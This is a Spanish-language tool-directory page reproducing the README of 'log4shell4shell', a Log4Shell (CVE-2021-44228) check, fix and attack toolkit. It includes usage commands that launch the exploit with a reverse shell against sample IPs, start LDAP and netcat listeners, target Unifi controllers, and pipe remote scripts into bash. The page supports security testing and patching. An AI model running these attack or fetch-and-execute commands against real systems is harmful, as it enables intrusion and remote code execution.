Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4shell4shell — Log4shell - Multi-Toolkit. Encuentra, corrige y prueba posibles vulnerabilidades CVE-2021-44228 - proporciona un entorno completo de prueba/ataque LOG4SHELL en shell | Kitploit
Herramientas/GitHubGitHub/suuhm/log4shell4shell
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - Multi-Toolkit. Encuentra, corrige y prueba posibles vulnerabilidades CVE-2021-44228 - proporciona un entorno completo de prueba/ataque LOG4SHELL en shell

Ver Repositorio
510hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

log4shell4shell

Log4j - Multiherramienta. Encuentra y corrige posibles vulnerabilidades CVE-2021-44228 - proporciona un entorno completo de prueba/ataque LOG4SHELL

Thumb

Características

  • Verifica tu sistema Linux/Mac/BSD y Windows en busca de vulnerabilidades CVE-2021-44228
  • Corrige tu sistema eliminando la clase java de log4j / o estableciendo algunas variables de entorno
  • Prueba de concepto: puedes ejecutar un servidor dummy de Spring Boot para probar el exploit por ti mismo (https://github.com/christophetd/log4shell-vulnerable-app)
  • Puedes ejecutar un ataque contra una IP-Puerto deseada e incluir un comando Base64 / O un simple Reverse Shell
  • Escaneo completo de rango IP por https://github.com/fullhunt/log4j-scan

Cómo ejecutar en Linux/Mac/BSD:

Requisitos:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

Verifica rápidamente tu sistema con este comando de una línea:

wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

Más Opciones

Ejecuta un ataque de muestra contra IP: 10.4.4.20 Puerto 8080 página de inicio de sesión y adicionalmente un Reverse Proxy Shell:

git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

Ejecuta screen -r l4s4s-ldap-srv y/o screen -r l4s4s-nc-rsh para ver algunas informaciones de ataque en el shell del servidor de explotación:

Ejecuta un escaneo completo IP: 10.4.4.20 Puerto 8080 y adicionalmente una prueba de todos los tests:

./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Ejecuta una prueba de concepto en un servidor Tomcat Springboot:

./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Ejecuta un ataque/verificación de exploit en Unifi-Controller (en 10.4.4.20:8443):

./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

Todas las opciones disponibles

_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Ejecutando Log4shell Framework & Check-Toolkit en shell v0.1a (C) 2021 suuhm

¡Entrada incorrecta! Por favor, ingresa una de estas opciones:

Uso: ./l4s4s.sh [OPCIONES] <IP:PUERTO|COMANDO>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMATO: IP:PUERTO> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <comando>

Cómo actualizar tu versión de python en Linux y/o macOS:

Simplemente ejecuta mi script auxiliar (--list-versions): ./python-upgrader.sh

Cómo ejecutar en Windows x86 / x64:

Simplemente ejecuta en Powershell (modo administrador): .\set_windows_fix.ps1

¡Este script es alpha! Así que por favor házmelo saber si tienes algún problema

Aviso legal

El proyecto log4shell4shell está hecho únicamente con fines educativos y de pruebas éticas. El uso de log4j-scan para atacar objetivos sin consentimiento mutuo previo es ilegal. Es responsabilidad del usuario final cumplir con todas las leyes locales, estatales y federales aplicables. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de ningún mal uso o daño causado por este programa.

Descargar herramienta